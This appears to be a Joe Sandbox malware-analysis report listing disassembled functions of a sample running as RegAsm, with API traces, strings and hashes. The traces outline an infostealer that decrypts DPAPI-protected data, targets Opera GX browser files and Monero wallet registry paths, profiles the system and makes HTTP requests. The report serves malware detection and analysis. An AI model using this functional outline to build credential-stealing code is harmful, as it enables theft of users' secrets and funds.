Part of subcall function 004061EF: LocalFree.KERNEL32(00000000,?,?,004058D6,00000000,?,?), ref: 00406242

memcmp.MSVCRT ref: 0040B98B

Part of subcall function 00406252: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00406275
Part of subcall function 00406252: LocalAlloc.KERNEL32(00000040,?,?), ref: 0040628D
Part of subcall function 00406252: LocalFree.KERNEL32(?), ref: 004062AB

Strings

DPAPI, xrefs: 0040B985
, xrefs: 0040B9B6

Memory Dump Source

Source File: 00000001.00000002.2106036038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2106036038.0000000000431000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.0000000000513000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.0000000000516000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.000000000051C000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.00000000005F4000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.000000000063C000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Local$Alloc$CryptFile$BinaryFreeH_prologString$CloseCreateDataHandleReadSizeUnprotectlstrcpymemcmp
String ID: $DPAPI
API String ID: 2477620391-1819349886
Opcode ID: 5ed004c30969e0cc65dd89488990c3e68523407aff077647a1b702d9de2502fe
Instruction ID: 5462ebcd07b9b3f23ea230b439bca26bcb77bd97e8f1387946214589f9c78b7e
Opcode Fuzzy Hash: 5ed004c30969e0cc65dd89488990c3e68523407aff077647a1b702d9de2502fe
Instruction Fuzzy Hash: DD21A2F2900509ABCF11AB95CD039EFBB79EF04310F15013BFA02B11D1EB39A654C6A9

Uniqueness

Uniqueness Score: -1.00%

Function 0040F12F Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 40memoryregistryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,00000000,?,?,?,00413565,00000000,?,Windows: ,00000000,?,0042451C,00000000,?,Work Dir: In memory), ref: 0040F143
HeapAlloc.KERNEL32(00000000,?,?,?,00413565,00000000,?,Windows: ,00000000,?,0042451C,00000000,?,Work Dir: In memory,00000000,?), ref: 0040F14A
RegOpenKeyExA.KERNEL32(80000002,00000000,00020119,00000000,?,?,?,00413565,00000000,?,Windows: ,00000000,?,0042451C,00000000,?), ref: 0040F178
RegQueryValueExA.KERNEL32(00000000,00000000,00000000,00000000,000000FF,?,?,?,00413565,00000000,?,Windows: ,00000000,?,0042451C,00000000), ref: 0040F194

Strings

Windows 11, xrefs: 0040F15B

Memory Dump Source

Source File: 00000001.00000002.2106036038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2106036038.0000000000431000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.0000000000513000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.0000000000516000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.000000000051C000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.00000000005F4000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.000000000063C000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Heap$AllocOpenProcessQueryValue
String ID: Windows 11
API String ID: 3676486918-2517555085
Opcode ID: 4c1697d9cb05b4db5057b5077521dec4cac67f92389f3bcf7131b559e4689ecb
Instruction ID: 7bc758894e67b39e7d898eda6472a7f8de8691deac7626c15fb90c1d10f9c35c
Opcode Fuzzy Hash: 4c1697d9cb05b4db5057b5077521dec4cac67f92389f3bcf7131b559e4689ecb
Instruction Fuzzy Hash: 43F04F71640205FBEB245BE1EC0AF6E7A7EEB44B40F105035BA01AA1E0E7B49A159B68

Uniqueness

Uniqueness Score: -1.00%

Function 0040E5D6 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 37memoryregistryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,00000000,?,?,?,0040E648,0040F157,?,?,?,00413565,00000000,?,Windows: ,00000000), ref: 0040E5EA
HeapAlloc.KERNEL32(00000000,?,?,?,0040E648,0040F157,?,?,?,00413565,00000000,?,Windows: ,00000000,?,0042451C), ref: 0040E5F1
RegOpenKeyExA.KERNEL32(80000002,00000000,00020119,00000000,?,?,?,0040E648,0040F157,?,?,?,00413565,00000000,?,Windows: ), ref: 0040E60F
RegQueryValueExA.KERNEL32(00000000,CurrentBuildNumber,00000000,00000000,00000000,000000FF,?,?,?,0040E648,0040F157,?,?,?,00413565,00000000), ref: 0040E62A

Strings

CurrentBuildNumber, xrefs: 0040E622

Memory Dump Source

Source File: 00000001.00000002.2106036038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2106036038.0000000000431000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.0000000000513000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.0000000000516000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.000000000051C000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.00000000005F4000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.000000000063C000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Heap$AllocOpenProcessQueryValue
String ID: CurrentBuildNumber
API String ID: 3676486918-1022791448
Opcode ID: 549e49055244fb50ba3e643d806a6003bcdca7952e55b5f0cffcd51b8ddef338
Instruction ID: b7f42767185e9f38a1ff468a9371dc0538b1b369f25423ee430d375e0e4f8806
Opcode Fuzzy Hash: 549e49055244fb50ba3e643d806a6003bcdca7952e55b5f0cffcd51b8ddef338
Instruction Fuzzy Hash: 83F01D71640204FBEB145BA1EC0AF6E7A7DEB44B04F201025FA01A5091EBB559119A68

Uniqueness

Uniqueness Score: -1.00%

Function 0040FAD8 Relevance: 7.6, APIs: 5, Instructions: 88COMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 0040FADD
memset.MSVCRT ref: 0040FAFF

Part of subcall function 0040F72E: GetProcessHeap.KERNEL32(00000000,000000FA,00000000,?,0040FB2C,00000000), ref: 0040F739
Part of subcall function 0040F72E: HeapAlloc.KERNEL32(00000000,?,0040FB2C,00000000), ref: 0040F740
Part of subcall function 0040F72E: wsprintfW.USER32 ref: 0040F751

OpenProcess.KERNEL32(00001001,00000000,?,?,00000000), ref: 0040FB86
TerminateProcess.KERNEL32(00000000,00000000), ref: 0040FB94
CloseHandle.KERNEL32(00000000), ref: 0040FB9B

Memory Dump Source

Source File: 00000001.00000002.2106036038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2106036038.0000000000431000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.0000000000513000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.0000000000516000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.000000000051C000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.00000000005F4000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.000000000063C000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Process$Heap$AllocCloseH_prologHandleOpenTerminatememsetwsprintf
String ID:
API String ID: 1628159694-0
Opcode ID: 4f46d6f5657ef04c19491e7227cdabfccf2d2a6ab8f92815efd4e5350b4c56dc
Instruction ID: 6225231a9b0983545f3dd611d0008504d281c271a7b0928af5f5abbaa91495a4
Opcode Fuzzy Hash: 4f46d6f5657ef04c19491e7227cdabfccf2d2a6ab8f92815efd4e5350b4c56dc
Instruction Fuzzy Hash: 91312972A01118ABCB21EBA1DC85DEFBB79FF05350F10046AF506F2191D7789A84CBE5

Uniqueness

Uniqueness Score: -1.00%

Function 0040EDA7 Relevance: 7.6, APIs: 5, Instructions: 70processCOMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 0040EDAC

Part of subcall function 0040E2EA: lstrcpy.KERNEL32(00000000,00000000), ref: 0040E314

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040EDE7
Process32First.KERNEL32(00000000,00000128), ref: 0040EDF8
Process32Next.KERNEL32(?,00000128), ref: 0040EE60
CloseHandle.KERNEL32(?,?,00000000), ref: 0040EE6D

Memory Dump Source

Source File: 00000001.00000002.2106036038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2106036038.0000000000431000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.0000000000513000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.0000000000516000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.000000000051C000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.00000000005F4000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.000000000063C000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Process32$CloseCreateFirstH_prologHandleNextSnapshotToolhelp32lstrcpy
String ID:
API String ID: 599723951-0
Opcode ID: 5d7eb946d37dbae006d3382ced3585bc01facc56a2b5579cdf30aa957cf0788d
Instruction ID: 442d2adc66867573a605d6bcc60739512b468c637e589a303a8df8f817b73186
Opcode Fuzzy Hash: 5d7eb946d37dbae006d3382ced3585bc01facc56a2b5579cdf30aa957cf0788d
Instruction Fuzzy Hash: 2A214FB1A00118EBCB04EFA6DD45AEEBBB9EF88344F04446EF405F3290CB784A548B65

Uniqueness

Uniqueness Score: -1.00%

Function 0040249B Relevance: 7.5, APIs: 5, Instructions: 39memorystringCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 004024B4

Part of subcall function 00402420: memset.MSVCRT ref: 00402445
Part of subcall function 00402420: CryptStringToBinaryA.CRYPT32(00000104,00000000,00000001,00000000,00000014,00000000,00000000), ref: 0040246B
Part of subcall function 00402420: CryptStringToBinaryA.CRYPT32(00000104,00000000,00000001,?,00000000,00000000,00000000), ref: 00402485

strcat.MSVCRT(?,00000000,?,?,00000000,00000104,00000014), ref: 004024C9
GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,?,00000014), ref: 004024D4
RtlAllocateHeap.NTDLL(00000000,?,?,?,?,?,00000014), ref: 004024DB

Part of subcall function 004022CC: ??_U@YAPAXI@Z.MSVCRT ref: 00402351

memset.MSVCRT ref: 00402504

Memory Dump Source

Source File: 00000001.00000002.2106036038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2106036038.0000000000431000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.0000000000513000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.0000000000516000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.000000000051C000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.00000000005F4000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.000000000063C000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: memset$BinaryCryptHeapString$AllocateProcessstrcat
String ID:
API String ID: 3248666761-0
Opcode ID: afdd7b3011673d52c96721e2c9069d36e8a2a3d42a33eac084e48a4c2f8877b8
Instruction ID: 81291bc694c62cd0b743446bc76ae1be4e6ee0c4b5db74b158aaa1b3385ea87d
Opcode Fuzzy Hash: afdd7b3011673d52c96721e2c9069d36e8a2a3d42a33eac084e48a4c2f8877b8
Instruction Fuzzy Hash: 29F031B6D44118BBDB10A7A5DD0AFCA76BC9F14348F0000A6B945F2082D9B4AB948AA4

Uniqueness

Uniqueness Score: -1.00%

Function 0040CD1E Relevance: 7.5, APIs: 2, Strings: 2, Instructions: 457COMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 0040CD23

Part of subcall function 0040E2EA: lstrcpy.KERNEL32(00000000,00000000), ref: 0040E314

StrCmpCA.SHLWAPI(00000000,Opera GX,00423BF6,00423BF3,?,?,?), ref: 0040CD6D

Part of subcall function 0040F7A3: SHGetFolderPathA.SHELL32(00000000,O<B,00000000,00000000,?), ref: 0040F7D4

Part of subcall function 0040E3EF: _EH_prolog.MSVCRT ref: 0040E3F4
Part of subcall function 0040E3EF: lstrcpy.KERNEL32(00000000), ref: 0040E440
Part of subcall function 0040E3EF: lstrcat.KERNEL32(?,?), ref: 0040E44A

Part of subcall function 0040E3A8: lstrcpy.KERNEL32(00000000,?), ref: 0040E3E1

Part of subcall function 0040E463: _EH_prolog.MSVCRT ref: 0040E468
Part of subcall function 0040E463: lstrlen.KERNEL32(?,00000000,00000014,?,?,00415C39,?,?,00424A48,?,00000000,004244C3), ref: 0040E490
Part of subcall function 0040E463: lstrcpy.KERNEL32(00000000), ref: 0040E4B7
Part of subcall function 0040E463: lstrcat.KERNEL32(?,?), ref: 0040E4C2

Part of subcall function 0040E321: lstrcpy.KERNEL32(00000000,FEF4858D), ref: 0040E347

Part of subcall function 0040F75F: _EH_prolog.MSVCRT ref: 0040F764
Part of subcall function 0040F75F: GetFileAttributesA.KERNEL32(00000000,?,0040D11E,?,?,?,?), ref: 0040F778

Part of subcall function 00401128: _EH_prolog.MSVCRT ref: 0040112D

Part of subcall function 0040B8F5: _EH_prolog.MSVCRT ref: 0040B8FA
Part of subcall function 0040B8F5: StrStrA.SHLWAPI(00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 0040B94D
Part of subcall function 0040B8F5: memcmp.MSVCRT ref: 0040B98B

Strings

Opera GX, xrefs: 0040CD55
#, xrefs: 0040D231

Memory Dump Source

Source File: 00000001.00000002.2106036038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2106036038.0000000000431000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.0000000000513000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.0000000000516000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.000000000051C000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.00000000005F4000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.000000000063C000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: H_prolog$lstrcpy$lstrcat$AttributesFileFolderPathlstrlenmemcmp
String ID: #$Opera GX
API String ID: 2375657845-1046280356
Opcode ID: e6ca4ff080e8c7767d2566800a8342b4988c1732a71bf4c8c806a54797525b13
Instruction ID: 34ed864e4e7d28deed13c865a2ed6ebf9a9f8fcae2343485183800af8996532d
Opcode Fuzzy Hash: e6ca4ff080e8c7767d2566800a8342b4988c1732a71bf4c8c806a54797525b13
Instruction Fuzzy Hash: 6C02707180124CEADF04EBE6D946ADEBBB8AF15308F14446EF801732C2DB785B18D766

Uniqueness

Uniqueness Score: -1.00%

Function 1982FD40 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 134fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNEL32(?,?,?,?,?), ref: 1982FE03

Strings

winRead, xrefs: 1982FE3D
delayed %dms for lock/sharing conflict at line %d, xrefs: 1982FE78

Memory Dump Source

Source File: 00000001.00000002.2114638603.0000000019828000.00000020.00001000.00020000.00000000.sdmp, Offset: 19820000, based on PE: true

Associated: 00000001.00000002.2114617552.0000000019820000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019821000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019986000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019A2D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115312661.0000000019A2F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115312661.0000000019A38000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115388733.0000000019A62000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_19820000_RegAsm.jbxd

Similarity

API ID: FileRead
String ID: delayed %dms for lock/sharing conflict at line %d$winRead
API String ID: 2738559852-1843600136
Opcode ID: 33d3089d0ced1c0c3a78018415a74434008c12668a6f6ecb11f092e402bfc77c
Instruction ID: d464d6a91c740b2fdf17120bf3be7633132930a1948dc29f6dbe10dc9efdb832
Opcode Fuzzy Hash: 33d3089d0ced1c0c3a78018415a74434008c12668a6f6ecb11f092e402bfc77c
Instruction Fuzzy Hash: 944104B26043456FC300DE68CD819ABB7A8FF88650FC8192DF945C7241E721E998CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 00411D72 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 94stringCOMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 00411D77
lstrlen.KERNEL32(00000000), ref: 00411D94
StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00411E58

Strings

ERROR, xrefs: 00411E52

Memory Dump Source

Source File: 00000001.00000002.2106036038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2106036038.0000000000431000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.0000000000513000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.0000000000516000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.000000000051C000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.00000000005F4000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.000000000063C000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: H_prologlstrlen
String ID: ERROR
API String ID: 2133942097-2861137601
Opcode ID: 78b53590cb42131a73bc90ee9761f4be8f64d29eee803dc2d75c48913128bc46
Instruction ID: d665764c68c2d683c75a42baa45f0e20be98dba9c60f49559ed6524b1d272c93
Opcode Fuzzy Hash: 78b53590cb42131a73bc90ee9761f4be8f64d29eee803dc2d75c48913128bc46
Instruction Fuzzy Hash: DB318571900148AFCB00EFAAD946ADD7FB4AF15318F10846EF905B7292D7389658C795

Uniqueness

Uniqueness Score: -1.00%

Function 00411A77 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 63COMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 00411A7C

Part of subcall function 0040E321: lstrcpy.KERNEL32(00000000,FEF4858D), ref: 0040E347

Part of subcall function 00404EF2: _EH_prolog.MSVCRT ref: 00404EF7
Part of subcall function 00404EF2: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00404F5A
Part of subcall function 00404EF2: StrCmpCA.SHLWAPI(?), ref: 00404F6E
Part of subcall function 00404EF2: InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00404F91
Part of subcall function 00404EF2: HttpOpenRequestA.WININET(?,GET,?,00000000,00000000,-00400100,00000000), ref: 00404FC7
Part of subcall function 00404EF2: InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00404FEB
Part of subcall function 00404EF2: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00404FF6
Part of subcall function 00404EF2: HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 00405014

StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00411ADA

Strings

ERROR, xrefs: 00411AC8
ERROR, xrefs: 00411B02

Memory Dump Source

Source File: 00000001.00000002.2106036038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2106036038.0000000000431000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.0000000000513000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.0000000000516000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.000000000051C000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.00000000005F4000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.000000000063C000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: HttpInternet$H_prologOpenRequest$ConnectInfoOptionQuerySendlstrcpy
String ID: ERROR$ERROR
API String ID: 1120091252-2579291623
Opcode ID: bbbad24492610d03f9cb6a343405c04e3a04baa2e778640e1f0c8b307578df75
Instruction ID: c10f265733079788ce1beb020a6bc8157ba9384e6cd0facc98e36d473c363c30
Opcode Fuzzy Hash: bbbad24492610d03f9cb6a343405c04e3a04baa2e778640e1f0c8b307578df75
Instruction Fuzzy Hash: CD213D74904148EEDB00FFE6C556BDD7BB4AF14308F5044AEE945A3282DB78AB18C766

Uniqueness

Uniqueness Score: -1.00%

Function 00412F70 Relevance: 6.1, APIs: 4, Instructions: 76sleepsynchronizationthreadCOMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 00412F75

Part of subcall function 00411EAC: _EH_prolog.MSVCRT ref: 00411EB1

Sleep.KERNEL32(000003E8,?,?,?,?,?,00000000), ref: 00412FF9
CreateThread.KERNEL32(00000000,00000000,00411D72,?,00000000,00000000), ref: 0041301B
WaitForSingleObject.KERNEL32(00000000,000003E8,?,00000000), ref: 00413023

Memory Dump Source

Source File: 00000001.00000002.2106036038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2106036038.0000000000431000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.0000000000513000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.0000000000516000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.000000000051C000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.00000000005F4000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.000000000063C000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: H_prolog$CreateObjectSingleSleepThreadWait
String ID:
API String ID: 2678630583-0
Opcode ID: 298882296a7955a9a225d578641df3838ff13dc64488900d3e042fe5a5ecd721
Instruction ID: 09c2a2700ced1d728891672dfd0f8811e0d164b67028549265d68e94afb5f6b6
Opcode Fuzzy Hash: 298882296a7955a9a225d578641df3838ff13dc64488900d3e042fe5a5ecd721
Instruction Fuzzy Hash: 2A317376800248EFCB01DFE5C985ADD7BB8FF08314F10442EF806A3281DB789A89CB54

Uniqueness

Uniqueness Score: -1.00%

Function 00401077 Relevance: 6.0, APIs: 4, Instructions: 35memoryregistryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,00000000,?,?,?,00401C88,80000001,SOFTWARE\monero-project\monero-core,wallet_path,?,00000000), ref: 0040108B
HeapAlloc.KERNEL32(00000000,?,?,?,00401C88,80000001,SOFTWARE\monero-project\monero-core,wallet_path,?,00000000), ref: 00401092
RegOpenKeyExA.KERNEL32(000000FF,00000000,00000000,00020119,?,?,?,?,00401C88,80000001,SOFTWARE\monero-project\monero-core,wallet_path,?,00000000), ref: 004010AB
RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,000000FF,?,?,?,00401C88,80000001,SOFTWARE\monero-project\monero-core,wallet_path,?,00000000), ref: 004010C4

Memory Dump Source

Source File: 00000001.00000002.2106036038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2106036038.0000000000431000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.0000000000513000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.0000000000516000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.000000000051C000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.00000000005F4000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.000000000063C000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Heap$AllocOpenProcessQueryValue
String ID:
API String ID: 3676486918-0
Opcode ID: 62e1056c78a3f24023a1fdf72ed8deb6e8d96f8ef2f78eddac7b94d0e7f5f07d
Instruction ID: 96c48622382358268536065744f297a8b6aaeb2530e943112dba2bcd85f22be7
Opcode Fuzzy Hash: 62e1056c78a3f24023a1fdf72ed8deb6e8d96f8ef2f78eddac7b94d0e7f5f07d
Instruction Fuzzy Hash: C5F03075640208FFDB145F91EC0AF9E7B7AEB44B00F104025FB01A61A0D7B19A119B64

Uniqueness

Uniqueness Score: -1.00%

Function 0040E89E Relevance: 6.0, APIs: 4, Instructions: 35memoryregistryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,00000000,?,?,?,00413A8A,00000000,?,Processor: ,00000000,?,[Hardware],00000000,?,004245CC), ref: 0040E8B2
HeapAlloc.KERNEL32(00000000,?,?,?,00413A8A,00000000,?,Processor: ,00000000,?,[Hardware],00000000,?,004245CC,00000000,?), ref: 0040E8B9
